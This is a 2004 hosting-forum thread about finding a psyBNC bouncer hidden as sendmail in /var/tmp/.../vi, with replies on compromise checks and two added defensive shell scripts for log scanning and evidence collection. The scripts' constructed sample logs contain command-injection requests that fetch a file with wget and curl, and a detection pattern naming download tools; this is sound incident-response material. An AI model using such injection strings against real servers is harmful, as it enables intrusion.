#1 | 04-16-2004, 02:25 AM | Junior Guru Wannabe | Join Date: Oct 2002 | Posts: 59
Found psyBNC on my server under one account.
What should I do?
And I can't go to that directory.
What should I do?
Quote:
gorgole was running [psyBNC] the process claimed to be [sendmail: accepting connections ? c-leet]
The binary is located at: /var/tmp/.../vi
http://www.adwis.net
#2 | 04-16-2004, 02:39 AM | Web Hosting Master | Join Date: Jun 2003 | Location: UK | Posts: 6,616
Kick the user, delete the account, check if the server has been compromised.
Russ Foster - Industry Curmudgeon
Freelance Sysadmin for Hire - email vaserv@gmail.com
#3 | 04-16-2004, 02:42 AM | Problem Solver | Join Date: Mar 2003 | Location: California USA | Posts: 13,681
/var/tmp/.../vi
That doesn't look too good. Do you have an old kernel on the box? Have you secured the server any? Do you get anything when you run:
for files in /usr/local/apache/domlogs/*; do grep "wget" "$files"; done
Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
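An added example, not code from the thread or from Rack911, that wraps the domlog grep Steven suggests above into something you can run against a whole log directory. It scans every access log in the directory for request lines that mention a download tool (wget, curl, fetch, lynx) or the %-encoded spellings of wget and curl that often hide in query strings, and reports which client addresses sent them. The log directory is passed as $1 (on cPanel it would be /usr/local/apache/domlogs, as in the post); the sample log lines it builds are constructed for the example.

```sh
#!/bin/sh
# Added example, not the thread's or Rack911's code: scan Apache-style
# access logs for requests that carry a download-tool name. The thread's
# one-liner greps each domlog for "wget"; this also catches curl, fetch,
# lynx and the %-encoded forms of wget/curl. Log lines are constructed.

# Emit one tab-separated line per hit: <logfile> <client ip> <log line>
scan_domlogs() {
    logdir="$1"
    pattern='wget|curl|fetch|lynx|%77%67%65%74|%63%75%72%6c'
    for logfile in "$logdir"/*; do
        [ -f "$logfile" ] || continue
        grep -Ei "$pattern" "$logfile" | while IFS= read -r line; do
            client=${line%% *}          # first field of a combined-format line
            printf '%s\t%s\t%s\n' "$logfile" "$client" "$line"
        done
    done
}

# Number of matching request lines across the whole directory.
count_hits() {
    scan_domlogs "$1" | wc -l | tr -d ' '
}

# Distinct client addresses behind the hits, one per line.
offending_clients() {
    scan_domlogs "$1" | cut -f2 | sort -u
}

# Build a throwaway domlogs directory with constructed sample lines:
# two ordinary page views, a command-injection attempt that fetches a
# file with wget, one that uses curl, and an encoded "wget".
make_sample_logs() {
    dir=$(mktemp -d)
    cat > "$dir/example.com" <<'EOF'
10.0.0.5 - - [16/Apr/2004:02:10:11 +0000] "GET /index.php HTTP/1.1" 200 1234 "-" "Mozilla/4.0"
10.0.0.9 - - [16/Apr/2004:02:11:02 +0000] "GET /cgi-bin/form.cgi?cmd=wget%20http://198.51.100.7/vi HTTP/1.0" 200 12 "-" "-"
10.0.0.9 - - [16/Apr/2004:02:11:05 +0000] "GET /gallery.php?f=;curl%20-o%20/var/tmp/.../vi HTTP/1.0" 200 12 "-" "-"
10.0.0.3 - - [16/Apr/2004:02:12:40 +0000] "GET /about.html HTTP/1.1" 200 987 "-" "Mozilla/5.0"
EOF
    cat > "$dir/example.net" <<'EOF'
10.0.0.9 - - [16/Apr/2004:02:13:00 +0000] "GET /x.php?u=%77%67%65%74 HTTP/1.0" 404 0 "-" "-"
EOF
    printf '%s\n' "$dir"
}

# Stand-alone run: report on the constructed logs.
sample=$(make_sample_logs)
scan_domlogs "$sample"
echo "hits: $(count_hits "$sample")"
```

On the constructed logs this reports three hits, all from 10.0.0.9; on a real box the hit list tells you which vhost was abused and which web application to look at next, and the timestamps line up with the file mtimes under /var/tmp.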
#4 | 04-16-2004, 03:05 AM | Junior Guru Wannabe | Join Date: Oct 2002 | Posts: 59
I don't know how to delete & clean this problem.
Do you have any step-by-step instructions, please?
http://www.adwis.net
#5 | 04-16-2004, 03:11 AM | Problem Solver | Join Date: Mar 2003 | Location: California USA | Posts: 13,681
Well, unfortunately it's not a step-by-step thing. You could be rooted and have a backdoor, or it could be simple and just as a user. But in any case you should set up some measures to help prevent this in the future.
It can be as simple as rm -rf /var/tmp/.../ BUT I seriously suggest you hire someone to check it out before you remove the files so they can evaluate what's going on. There are many companies out there that can do this.
serverwizards
easyservermanagement
wemanageservers
rackaid
etc.
#6 | 04-16-2004, 06:26 PM | I Squash Server Problems | Join Date: Apr 2001 | Location: FL, USA | Posts: 949
Do not just remove the files!!! Those files are clues to when and who placed the bot on your system. If you must stop the bot immediately, dump netstat and ps screens to a text file. They can all be very useful in diagnosing who put the file on your system and when it was started. Also, hackers like to call files one thing when they actually do another.
In this situation, you should verify the integrity of netstat and check for unusual ports. An external portscan would be useful as well in case there are modules altering the netstat results.
If the owner of the file is apache or root, then you may have been hacked. Tools like chkrootkit and rkhunter can be helpful but do not substitute for a thorough security scan.
We save you time, money, and frustration by handling the server management tasks required to run an online business successfully.
No prodding required. We just do it right the first time. Red Hat, MySQL, Plesk, and cPanel certified staff.
#7 | 04-16-2004, 06:41 PM | Problem Solver | Join Date: Mar 2003 | Location: California USA | Posts: 13,681
Huck, it depends on the control panel as to what the file will be owned by; for example, cPanel's Apache runs as the user nobody.
#8 | 04-16-2004, 07:03 PM | I Squash Server Problems | Join Date: Apr 2001 | Location: FL, USA | Posts: 949
Yeah, I know that. I should have been more specific and said owned by Apache's user ID or group ID. I was speaking of Apache in a generic sense. I've seen many different UIDs for Apache, including but not limited to:
apache
httpd
http
httpdssl
httpds
admserv
server
and a few more......
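An added example, not code from the thread or from either poster's company, that puts Huck's advice in #6 and the ownership rule of thumb from #6, #7 and #8 into a script: snapshot the process and socket tables and the metadata and checksums of every file under the suspect directory without touching it, then classify each file's owner (root or a web-server UID points at the server itself, a customer UID points at one account). The suspect path is passed as $1; the directory built by make_sample_suspect is a constructed stand-in for /var/tmp/.../ and contains only placeholder files. The list of web-server UIDs is Huck's from #8 plus cPanel's "nobody" from #7 and Debian's www-data.

```sh
#!/bin/sh
# Added example, not code from the thread: preserve evidence about a
# suspicious directory before anyone deletes it, then classify file owners
# the way the thread does. Suspect path and sample files are constructed.

# Snapshot process/socket tables and per-file metadata and checksums into a
# fresh directory; prints that directory. Nothing under $1 is changed.
collect_evidence() {
    suspect="$1"
    out=$(mktemp -d)
    # Process and network state, using whichever tools this box has.
    command -v ps      >/dev/null 2>&1 && ps auxww     > "$out/ps.txt"      2>/dev/null || true
    command -v netstat >/dev/null 2>&1 && netstat -anp > "$out/netstat.txt" 2>/dev/null || true
    command -v ss      >/dev/null 2>&1 && ss -anp      > "$out/ss.txt"      2>/dev/null || true
    # Owner, mode, size and mtime of every path, dot-files included.
    find "$suspect" -exec ls -lad {} + > "$out/listing.txt" 2>/dev/null || true
    # Checksums so a renamed copy can still be matched later; sha256sum
    # where available, POSIX cksum otherwise.
    if command -v sha256sum >/dev/null 2>&1; then sumcmd=sha256sum; else sumcmd=cksum; fi
    find "$suspect" -type f -exec "$sumcmd" {} + > "$out/checksums.txt" 2>/dev/null || true
    printf '%s\n' "$out"
}

# Map a file owner to the thread's rule of thumb: root, webserver or account.
classify_owner() {
    case "$1" in
        root) echo root ;;
        apache|httpd|http|httpdssl|httpds|admserv|server|nobody|www-data) echo webserver ;;
        *) echo account ;;
    esac
}

# One tab-separated line per file under $1: path, owner, classification.
owner_report() {
    find "$1" -type f 2>/dev/null | while IFS= read -r f; do
        owner=$(ls -ld "$f" | awk '{print $3}')
        printf '%s\t%s\t%s\n' "$f" "$owner" "$(classify_owner "$owner")"
    done
}

# Constructed stand-in for the hidden /var/tmp/.../ directory from the post.
make_sample_suspect() {
    base=$(mktemp -d)
    mkdir -p "$base/..."
    printf '#!/bin/sh\necho "placeholder, not a bouncer"\n' > "$base/.../vi"
    chmod 755 "$base/.../vi"
    printf 'placeholder config\n' > "$base/.../.conf"
    printf '%s\n' "$base"
}

# Stand-alone run against the constructed directory.
s=$(make_sample_suspect)
echo "evidence saved under: $(collect_evidence "$s")"
owner_report "$s"
```

Run it as root before any cleanup so the ps and netstat dumps are complete; if netstat itself is suspect, as Huck notes, compare its output with an external port scan rather than trusting the local snapshot alone.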
#9 | 04-17-2004, 10:33 AM | Retired Moderator | Join Date: Mar 2004 | Location: Singapore | Posts: 6,990
I suggest you just reformat and reinstall to be 100% safe; you won't know if you have backdoors.